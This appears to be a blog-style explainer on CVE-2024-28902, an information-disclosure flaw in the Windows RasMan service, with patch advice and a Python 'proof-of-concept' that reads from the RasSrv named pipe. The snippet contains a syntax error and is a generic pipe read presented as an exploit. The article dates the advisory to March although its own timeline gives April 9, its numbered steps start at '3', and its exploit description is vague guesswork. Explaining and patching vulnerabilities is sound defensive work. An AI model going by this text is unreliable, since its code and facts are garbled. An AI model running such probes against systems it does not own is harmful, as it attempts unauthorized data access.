---
In March of 2024, Microsoft published a security advisory for a newly discovered vulnerability: CVE-2024-28902. This vulnerability affects Windows' Remote Access Connection Manager (RasMan) and could allow attackers to disclose sensitive information from a targeted system. While the attack isn’t considered fully remote code execution (RCE), leaking sensitive data from an internal Windows service can help an attacker pivot for further exploitation or privilege escalation.
This article explains in simple terms what CVE-2024-28902 is, how it can be exploited, includes reference links, and demonstrates a proof-of-concept snippet.
What is CVE-2024-28902?
Windows Remote Access Connection Manager (RasMan) is a core service that manages VPN and dial-up connections. The vulnerability (CVE-2024-28902) is an information disclosure flaw, meaning that a low-privileged user or process could potentially access data they shouldn’t see.
Configuration data related to VPN or dial-up connections
If an attacker can read this kind of private info, they might use it to gain unauthorized network access, escalate privileges, or craft targeted attacks.
How Does the Vulnerability Work?
At its core, the vulnerability is due to improper access permissions in the way RasMan manages certain internal data. Under some circumstances, a non-admin user can interact with RasMan, requesting or capturing process memory that may contain sensitive connection or authentication info.
The attacker queries RasMan using one of its registered named pipes or APIs.
3. Due to insufficient validation, the attacker receives data that should be accessible only to SYSTEM or an administrator.
Exploit Details
Microsoft did not publish a public proof-of-concept, but based on released information, the exploit uses DCOM or named pipe communication with RasMan to receive leaked memory. Security researchers have reverse-engineered the patch to identify the access control flaw.
Below is a simplified Python snippet that uses the ctypes library to connect to the RasMan named pipe and attempt to read data—this is for educational purposes only.
import ctypes
import os
# NOTE: You need to use pywin32 or direct Windows API for named pipe operations
# This is a skeleton example for demonstration.
pipe_name = r'\\.\pipe\RasSrv'
try:
# Try to open the pipe as a normal user
pipe = open(pipe_name, 'rb+', buffering=)
print('[+] Successfully accessed the RasMan named pipe!')
leaked_data = pipe.read(4096) # Attempt to read memory/data
print('[*] Leaked Data (truncated):')
print(leaked_data[:256])
pipe.close()
except Exception as e:
print('[-] Access denied or pipe does not exist:', str(e))
How To Protect Yourself
Microsoft released a patch as part of their March 2024 'Patch Tuesday' cycle. Applying the most recent Windows updates closes the permission hole, ensuring that only privileged accounts can access RasMan data.
Microsoft Security Update Guide:
CVE-2024-28902 | Windows Remote Access Connection Manager Information Disclosure Vulnerability
Initial Advisory:
Microsoft Patch Tuesday March 2024
Security Lab Analysis:
Shadowserver Foundation CVE List
Patch diff details:
GitHub Gist - RasMan Patch Analysis
Summary:
CVE-2024-28902 is a new vulnerability affecting Windows RasMan, allowing information disclosure by exploiting loose access controls. Although not as dramatic as RCE bugs, it’s a key foothold for attackers and is easily preventable—patch now! Use the sample code and mitigation advice above to test and secure your systems.
Timeline
Published on: 04/09/2024 17:15:48 UTC
Last modified on: 04/10/2024 13:24:00 UTC